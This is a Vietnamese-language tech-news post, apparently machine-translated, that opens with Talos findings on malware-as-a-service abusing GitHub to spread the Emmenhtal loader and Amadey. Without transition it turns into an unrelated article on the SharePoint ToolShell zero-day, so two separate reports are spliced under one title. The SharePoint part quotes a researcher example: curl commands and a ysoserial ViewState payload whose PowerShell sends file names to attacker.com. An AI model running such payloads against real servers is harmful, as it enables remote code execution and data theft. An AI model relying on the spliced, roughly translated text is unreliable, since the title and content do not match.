Hotline: 0917111899 - 0914140366 hoặc kinhdoanh@itw.vn

Icon heart
0
Icon cart 0
  • Trang chủ
  • Phần mềm & Bảo mật
  • GitHub bị lạm dụng để phân phối các phần mềm độc hại thay mặt cho dịch vụ phần mềm độc hại (malware-as-a-service).

GitHub bị lạm dụng để phân phối các phần mềm độc hại thay mặt cho dịch vụ phần mềm độc hại (malware-as-a-service).

Tác giả tanthanh 10/02/2026 20 phút đọc

Các nhà nghiên cứu từ nhóm bảo mật Talos của Cisco đã phát hiện ra một nhà điều hành phần mềm độc hại dưới dạng dịch vụ đã sử dụng các tài khoản GitHub công khai làm kênh để phân phối một loại phần mềm độc hại cho các mục tiêu.

Việc sử dụng GitHub đã mang lại cho phần mềm độc hại dưới dạng dịch vụ (MaaS) một nền tảng đáng tin cậy và dễ sử dụng, được bật đèn xanh trong nhiều mạng doanh nghiệp dựa vào kho lưu trữ mã cho phần mềm mà họ phát triển. GitHub đã xóa ba tài khoản lưu trữ tải trọng độc hại ngay sau khi được Talos thông báo.

“Ngoài việc là một phương tiện lưu trữ tệp dễ dàng, việc tải xuống các tệp từ kho GitHub có thể bỏ qua quá trình lọc Web không được định cấu hình để chặn miền GitHub, các nhà nghiên cứu của” Talos Chris Neal và Craig Jackson viết thứ năm. “Trong khi một số tổ chức có thể chặn GitHub trong môi trường của họ để hạn chế việc sử dụng công cụ tấn công nguồn mở và phần mềm độc hại khác, nhiều tổ chức có nhóm phát triển phần mềm yêu cầu quyền truy cập GitHub ở một mức độ nào đó. Trong những môi trường này, việc tải xuống GitHub độc hại có thể khó phân biệt với lưu lượng truy cập web thông thường.”

Emmenhtal, gặp Amadey

Chiến dịch mà Talos cho biết đã diễn ra từ tháng 2, sử dụng trình tải phần mềm độc hại đã biết trước đó được theo dõi dưới những cái tên bao gồm Emmenhtal và PeakLight. Các nhà nghiên cứu từ công ty bảo mật Mạng Palo Alto và cơ quan mạng nhà nước lớn của Ukraine SSSCIP đã ghi lại việc sử dụng Emmenhtal trong một chiến dịch riêng biệt nhúng trình tải vào các email độc hại để phân phối phần mềm độc hại cho các thực thể Ukraine. Talos đã tìm thấy biến thể Emmenhtal tương tự trong hoạt động MaaS, chỉ lần này trình tải mới được phân phối thông qua GitHub.

Chiến dịch sử dụng GitHub khác với chiến dịch nhắm mục tiêu vào các thực thể Ukraine theo một cách quan trọng khác. Trong khi tải trọng cuối cùng trong tải trọng nhắm mục tiêu vào các thực thể Ukraine là một cửa sau độc hại được gọi là SmokeLoader, thì tải trọng GitHub đã cài đặt Amadey, một nền tảng phần mềm độc hại riêng biệt được biết đến. Amadey được nhìn thấy lần đầu tiên vào năm 2018 và ban đầu được sử dụng để lắp ráp botnet. Talos cho biết chức năng chính của Amadey là thu thập thông tin hệ thống từ các thiết bị bị nhiễm và tải xuống một bộ tải trọng thứ cấp được tùy chỉnh theo đặc điểm riêng của chúng, dựa trên mục đích cụ thể trong các chiến dịch khác nhau.

Sau khi mục tiêu bị nhiễm Amadey, người điều hành chiến dịch có thể chọn tải trọng nào sẽ phân phối tới mục tiêu đó thông qua URL GitHub đơn giản. Talos nhận thấy rằng chiến dịch do GitHub lưu trữ có thể là một phần của hoạt động MaaS lớn hơn. Các nhà nghiên cứu giải thích:

MaaS là một mô hình kinh doanh trong đó các nhà khai thác dịch vụ bán quyền truy cập vào phần mềm độc hại hoặc cơ sở hạ tầng có sẵn. Trong hoạt động mà Talos đã xác định, các nhà khai thác đã sử dụng Amadey để tải xuống nhiều dòng phần mềm độc hại từ kho GitHub giả lên các máy chủ bị nhiễm. Hoạt động ban đầu xuất hiện vào tháng 2 năm 2025, cùng thời điểm với chiến dịch SmokeLoader.

Việc phân phối một số dòng phần mềm độc hại khác nhau từ một cơ sở hạ tầng duy nhất cho thấy rằng các tác nhân đe dọa đằng sau các trường hợp của Amadey đang phân phối tải trọng cho các cá nhân hoặc nhóm khác. Ngoài ra, cơ sở hạ tầng chỉ huy và điều khiển (C2) cho tải trọng thứ cấp không trùng lặp với cơ sở hạ tầng của Amadey.

Các tập lệnh Emmenhtal trong chiến dịch có thiết kế bốn lớp giống nhau. Ba trong số các lớp đóng vai trò là biện pháp che giấu. Lớp thứ tư cung cấp tập lệnh tải xuống PowerShell cuối cùng.

Talos cũng tìm thấy các tài khoản GitHub lưu trữ phần mềm độc hại được ngụy trang dưới dạng tệp MP4 và trình tải dựa trên Python tùy chỉnh có tên checkbalance.py.

Bài đăng hôm thứ Năm cung cấp danh sách các chỉ số mà quản trị viên và người bảo vệ có thể sử dụng để xác định xem mạng có bị nhắm mục tiêu trong chiến dịch hay không.

Lỗ hổng này, được theo dõi là CVE-2025-53770, có mức độ nghiêm trọng là 9,8/10. Nó cung cấp quyền truy nhập từ xa không được xác thực vào Máy chủ SharePoint được hiển thị trên Internet. Bắt đầu từ thứ Sáu, các nhà nghiên cứu bắt đầu cảnh báo về việc khai thác tích cực lỗ hổng, ảnh hưởng đến Máy chủ SharePoint mà khách hàng cơ sở hạ tầng chạy nội bộ. SharePoint Online được lưu trữ trên đám mây của Microsoft và Microsoft 365 không bị ảnh hưởng.

Không phải webshell điển hình của bạn

Microsoft xác nhận các cuộc tấn công vào việc khai thác ngày 0 vào thứ Bảy. Một ngày sau, công ty đã cập nhật bài đăng để cung cấp bản cập nhật khẩn cấp vá lỗ hổng và bản cập nhật liên quan được theo dõi là CVE-2025-53771, trong Phiên bản đăng ký SharePoint và SharePoint 2019. Khách hàng sử dụng một trong hai phiên bản nên áp dụng các bản cập nhật ngay lập tức. SharePoint 2016 vẫn chưa được vá tại thời điểm bài đăng Ars này đi vào hoạt động. Microsoft nói rằng các tổ chức sử dụng phiên bản này nên cài đặt các Giao diện quét phần mềm chống phần mềm độc hại.

Chuỗi khai thác được quan sát có liên quan chặt chẽ với các chuỗi được chứng minh vào tháng 5 tại cuộc thi hack Pwn2Own ở Berlin cho hai lỗ hổng riêng biệt. Các lỗ hổng bị khai thác, được theo dõi là CVE-2025-49704 và CVE-2025-49706, đã được vá một phần hai tuần trước trong bản phát hành cập nhật hàng tháng của Microsoft. Các bản vá cuối tuần này dành cho CVE-2025-53770 và CVE-2025-53771 bao gồm “các biện pháp bảo vệ mạnh mẽ hơn ” tương ứng cho CVE-2025-49704 và CVE-2025-49706 của Microsoft nói rằng".

Việc cài đặt các bản cập nhật chỉ là bước khởi đầu của quá trình khôi phục, vì việc lây nhiễm cho phép kẻ tấn công thực hiện bằng thông tin xác thực cho phép truy cập rộng rãi vào nhiều tài nguyên nhạy cảm bên trong mạng bị xâm phạm. Thông tin thêm về các bước bổ sung sau trong bài viết này.

Vào thứ Bảy, các nhà nghiên cứu từ công ty bảo mật Eye Security báo cáo phát hiện “hàng chục hệ thống bị xâm phạm tích cực trong hai đợt tấn công, vào ngày 18 tháng 7 khoảng 18:00 UTC và ngày 19 tháng 7 khoảng 07:30 UTC.” Các hệ thống nằm rải rác trên toàn cầu đã bị tấn công bằng cách sử dụng lỗ hổng bị khai thác và sau đó bị nhiễm một cửa hậu dựa trên webshell có tên ToolShell. Các nhà nghiên cứu của Eye Security cho biết cửa sau có thể truy cập vào các phần nhạy cảm nhất của Máy chủ SharePoint và từ đó trích xuất các mã thông báo cho phép chúng thực thi mã cho phép kẻ tấn công mở rộng phạm vi tiếp cận của chúng bên trong mạng.

“Đây không phải là vỏ web điển hình của bạn, các nhà nghiên cứu của Eye Security đã viết. “Không có lệnh tương tác, shell đảo ngược hoặc logic lệnh và điều khiển. Thay vào đó, trang được gọi nội bộ.NET để đọc cấu hình MachineKey của máy chủ SharePoint, bao gồm ValidationKey. Các khóa này rất cần thiết để tạo tải trọng __VIEWSTATE hợp lệ và việc có được quyền truy cập vào chúng sẽ biến bất kỳ yêu cầu SharePoint được xác thực nào thành cơ hội thực thi mã từ xa một cách hiệu quả.”

Việc thực thi mã từ xa được thực hiện bằng cách sử dụng khai thác để nhắm mục tiêu cách SharePoint dịch cấu trúc dữ liệu và trạng thái đối tượng thành các định dạng có thể được lưu trữ hoặc truyền đi và sau đó được xây dựng lại sau đó, một quá trình được gọi là tuần tự hóa. MỘT Lỗ hổng SharePoint Microsoft đã sửa lỗi vào năm 2021 đã có thể lạm dụng logic phân tích cú pháp để đưa các đối tượng vào các trang. Điều này xảy ra vì SharePoint đã chạy các đối tượng ASP.NET ViewState bằng cách sử dụng khóa ký ValidationKey, được lưu trữ trong cấu hình của máy. Điều này có thể cho phép kẻ tấn công khiến SharePoint giải tuần tự hóa các đối tượng tùy ý và thực thi các lệnh nhúng. Tuy nhiên, những khai thác đó bị hạn chế bởi yêu cầu tạo chữ ký hợp lệ, do đó yêu cầu quyền truy cập vào Khóa xác thực bí mật của máy chủ.

Các nhà nghiên cứu đã viết:

Giờ đây, với chuỗi ToolShell (CVE-2025-49706 + CVE-2025-49704), những kẻ tấn công dường như đã trích xuất được

ValidationKey trực tiếp từ bộ nhớ hoặc cấu hình. Sau khi tài liệu mật mã này bị rò rỉ, kẻ tấn công có thể tạo ra tài liệu hoàn toàn hợp lệ, có chữ ký __VIEWSTATE tải trọng bằng cách sử dụng một công cụ được gọi là ysoserial như trong ví dụ dưới đây.

Sử dụng ysoserial kẻ tấn công có th tạo ra nó có mã thông báo SharePoint hợp lệ riêng cho RCE.

# command to get the  via any public available SharePoint page, like start.aspx
curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'
# example malicious Powershell viewstate payload that the adversary can utilize as RCE to list a dir
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="" \
--validationkey="" \
--validationalg="" \
--islegacy \
--minify
# finally, by adding the generated token to any request, the command is executed (RCE)
curl http://target/_layouts/15/success.aspx?__VIEWSTATE=

Các tải trọng này có thể nhúng bất kỳ lệnh độc hại nào và được máy chủ chấp nhận làm đầu vào đáng tin cậy, hoàn thành chuỗi RCE mà không yêu cầu thông tin xác thực. Điều này phản ánh điểm yếu về thiết kế được khai thác vào năm 2021, nhưng hiện được đóng gói thành chuỗi zero-day hiện đại với tính năng thả vỏ tự động, tính bền bỉ hoàn toàn và xác thực bằng 0.

Vá chỉ là khởi đầu

Những kẻ tấn công đang sử dụng khả năng đánh cắp khóa máy SharePoint ASP.NET, cho phép kẻ tấn công thực hiện các vụ hack cơ sở hạ tầng bổ sung sau này. Điều đó có nghĩa là việc vá lỗi một mình không đảm bảo rằng những kẻ tấn công đã bị đuổi ra khỏi một hệ thống bị xâm nhập. Thay vào đó, các tổ chức bị ảnh hưởng phải xoay các phím máy SharePoint ASP.NET và khởi động lại máy chủ web IIS đang chạy trên đầu trang.

Theo như Washington Post, ít nhất hai cơ quan liên bang đã phát hiện ra rằng các máy chủ bên trong mạng của họ đã bị xâm phạm trong các cuộc tấn công đang diễn ra.

Bài đăng Eye Security cung cấp các chỉ báo kỹ thuật mà quản trị viên có thể sử dụng để xác định xem hệ thống của họ có bị nhắm mục tiêu trong các cuộc tấn công hay không. Nó cũng cung cấp nhiều biện pháp khác nhau mà các tổ chức dễ bị tổn thương có thể thực hiện để củng cố hệ thống của họ chống lại hoạt động này.

Trong một post vào chủ nhật, Cơ quan An ninh Cơ sở hạ tầng và An ninh mạng Hoa Kỳ đã xác nhận các cuộc tấn công và việc sử dụng ToolShell của chúng. Bài đăng tiếp tục cung cấp danh sách các biện pháp bảo mật của riêng mình.

Tác giả tanthanh Admin
Bài viết trước Lỗ hổng bảo mật SharePoint với mức độ nghiêm trọng 9.8 đang bị khai thác trên toàn cầu.

Lỗ hổng bảo mật SharePoint với mức độ nghiêm trọng 9.8 đang bị khai thác trên toàn cầu.
Bài viết tiếp theo

Ubuntu vô hiệu hóa các biện pháp giảm thiểu rủi ro bảo mật của GPU Intel, hứa hẹn tăng hiệu năng lên 20%.

Ubuntu vô hiệu hóa các biện pháp giảm thiểu rủi ro bảo mật của GPU Intel, hứa hẹn tăng hiệu năng lên 20%.
Viết bình luận
Thêm bình luận

Bài viết liên quan

Lỗ hổng bảo mật SharePoint với mức độ nghiêm trọng 9.8 đang bị khai thác trên toàn cầu. Phần mềm & Bảo mật
10/02/2026

Lỗ hổng bảo mật SharePoint với mức độ nghiêm trọng 9.8 đang bị khai thác trên toàn cầu.

Các nhà chức trách và nhà nghiên cứu đang gióng lên hồi chuông cảnh báo về việc khai thác hàng loạt ...

Những điều cần biết về ToolShell, mối đe dọa SharePoint đang bị khai thác hàng loạt. Phần mềm & Bảo mật
10/02/2026

Những điều cần biết về ToolShell, mối đe dọa SharePoint đang bị khai thác hàng loạt.

Các cơ quan chính phủ và khu vực tư nhân đã bị bao vây trong bốn ngày qua sau khi phát hiện ra rằng ...

Các cuộc tấn công chuỗi cung ứng vào phần mềm mã nguồn mở đang trở nên mất kiểm soát. Phần mềm & Bảo mật
10/02/2026

Các cuộc tấn công chuỗi cung ứng vào phần mềm mã nguồn mở đang trở nên mất kiểm soát.

Đây là một tuần bận rộn đối với các cuộc tấn công chuỗi cung ứng nhắm vào phần mềm nguồn mở có sẵn ...

Google phát hiện phần mềm độc hại được cài đặt tùy chỉnh trên các thiết bị mạng SonicWall. Phần mềm & Bảo mật
10/02/2026

Google phát hiện phần mềm độc hại được cài đặt tùy chỉnh trên các thiết bị mạng SonicWall.

Các nhà nghiên cứu từ Google Threat Intelligence Group cho biết tin tặc đang xâm phạm các thiết bị ...

Tin tặc lợi dụng điểm mù bằng cách giấu phần mềm độc hại bên trong các bản ghi DNS. Phần mềm & Bảo mật
10/02/2026

Tin tặc lợi dụng điểm mù bằng cách giấu phần mềm độc hại bên trong các bản ghi DNS.

Tin tặc đang lưu trữ phần mềm độc hại ở một nơi mà phần lớn nằm ngoài tầm với của hầu hết các bản ...

Các tiện ích mở rộng trình duyệt biến gần 1 triệu trình duyệt thành các bot thu thập dữ liệu từ trang web. Phần mềm & Bảo mật
10/02/2026

Các tiện ích mở rộng trình duyệt biến gần 1 triệu trình duyệt thành các bot thu thập dữ liệu từ trang web.

Một nhà nghiên cứu cho biết, các tiện ích mở rộng được cài đặt trên gần 1 triệu thiết bị đã vượt qua ...

Thông báo

0917111899

Menu

Ngành hàng

Hotline

0917111899 - 0914140366

Email

kinhdoanh@itw.vn

Copyright 2025 © THẾ GIỚI TIN HỌC